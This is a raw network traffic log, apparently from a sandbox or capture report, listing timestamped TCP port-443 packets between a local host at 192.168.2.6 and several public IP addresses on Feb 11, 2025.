                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334371090 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334445000 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334476948 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334547043 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334677935 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334742069 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334799051 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334824085 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334858894 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334865093 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.334883928 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335277081 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335335016 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335340977 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335395098 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335568905 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335604906 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335633993 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335639954 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335673094 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335673094 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335772038 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.335822105 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.336215019 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.336288929 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.336381912 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.336436987 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.336509943 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.336565971 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.336620092 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.336673975 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.336822033 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.337197065 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.337243080 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.337275982 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.337331057 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.337424994 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.337476015 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.337622881 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.337697983 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.338078022 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.338134050 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.375097990 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.375106096 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.375170946 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.419830084 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.419852018 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.419913054 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.419930935 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.419998884 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420360088 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420375109 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420429945 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420437098 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420492887 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420492887 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420898914 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420916080 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420972109 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420977116 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.420986891 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.421055079 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.421591043 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.421605110 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.421669960 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.421675920 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.421714067 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.424421072 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.424436092 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.424479008 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.424484015 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.424510956 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.424555063 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.424885988 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.424901962 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.424972057 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.424978018 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.425026894 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.425393105 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.425410032 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.425484896 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.425491095 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.425538063 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506303072 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506336927 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506417990 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506432056 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506477118 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506634951 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506675959 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506690979 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506696939 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506726980 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506773949 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.506834030 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.793291092 CET49739443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.793318987 CET44349739188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.819370985 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.819423914 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.819495916 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.819822073 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.819839001 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.820605040 CET49743443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.820621967 CET44349743104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.820765972 CET49743443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.821099043 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.821141005 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.821206093 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.821352005 CET49743443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.821369886 CET44349743104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.821686029 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.821702003 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.008508921 CET4434974140.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.008589983 CET49741443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.012700081 CET49741443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.012712955 CET4434974140.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.012952089 CET4434974140.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.015224934 CET49741443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.015291929 CET49741443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.015296936 CET4434974140.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.015394926 CET49741443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.063324928 CET4434974140.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.189533949 CET4434974140.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.189615011 CET4434974140.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.189681053 CET49741443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.189887047 CET49741443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.189908028 CET4434974140.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.474244118 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.474273920 CET44349743104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.474409103 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.474493980 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.474520922 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.474594116 CET49743443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.474601030 CET44349743104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.474734068 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.474769115 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.475562096 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.475620985 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.475665092 CET44349743104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.475716114 CET49743443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.475827932 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.475878954 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.477137089 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.477195978 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.477804899 CET49743443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.477866888 CET44349743104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.478096008 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.478158951 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.478281021 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.478288889 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.478384972 CET49743443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.478389978 CET44349743104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.478477955 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.478486061 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.526988983 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.526988983 CET49743443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.526993990 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.576951027 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.577033043 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.577070951 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.577080965 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.577316999 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.577363014 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.577366114 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.577373028 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.577398062 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.577745914 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.578255892 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.578301907 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.578309059 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.578355074 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.578393936 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.578398943 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.584495068 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.584582090 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.584588051 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.617855072 CET44349743104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.617918015 CET44349743104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.618009090 CET49743443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.618515968 CET49743443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.618535042 CET44349743104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.620280981 CET49745443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.620330095 CET44349745104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.620412111 CET49745443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.620676041 CET49745443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.620688915 CET44349745104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624188900 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624253035 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624296904 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624330044 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624332905 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624345064 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624382019 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624393940 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624438047 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624531031 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.624989986 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.625050068 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.625057936 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.628825903 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.628866911 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.628874063 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.628881931 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.628932953 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.628938913 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.634166002 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.664905071 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.664913893 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.664956093 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.664979935 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.664993048 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.664994955 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.665011883 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.665039062 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.665071011 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.666722059 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.666738033 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.666822910 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.666830063 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.666986942 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.680984020 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715131998 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715207100 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715260029 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715267897 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715292931 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715339899 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715348005 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715548992 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715663910 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715666056 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715679884 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715945005 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.715985060 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716005087 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716012955 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716023922 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716362953 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716419935 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716428995 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716541052 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716588974 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716589928 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716603994 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716660976 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.716666937 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717231035 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717273951 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717279911 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717287064 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717343092 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717411995 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717478037 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717513084 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717523098 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717530012 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717575073 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.717581987 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.718066931 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.718127966 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.718173981 CET49744443192.168.2.6104.17.25.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.718188047 CET44349744104.17.25.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.729476929 CET49746443192.168.2.6104.17.24.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.729521036 CET44349746104.17.24.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.729592085 CET49746443192.168.2.6104.17.24.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.730237961 CET49746443192.168.2.6104.17.24.14
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.730267048 CET44349746104.17.24.14192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.751215935 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.751250029 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.751291990 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.751322985 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.751344919 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.751547098 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.752057076 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.752074003 CET44349742151.101.130.137192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.752123117 CET49742443192.168.2.6151.101.130.137
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.752136946 CET44349742151.101.130.137192.168.2.6
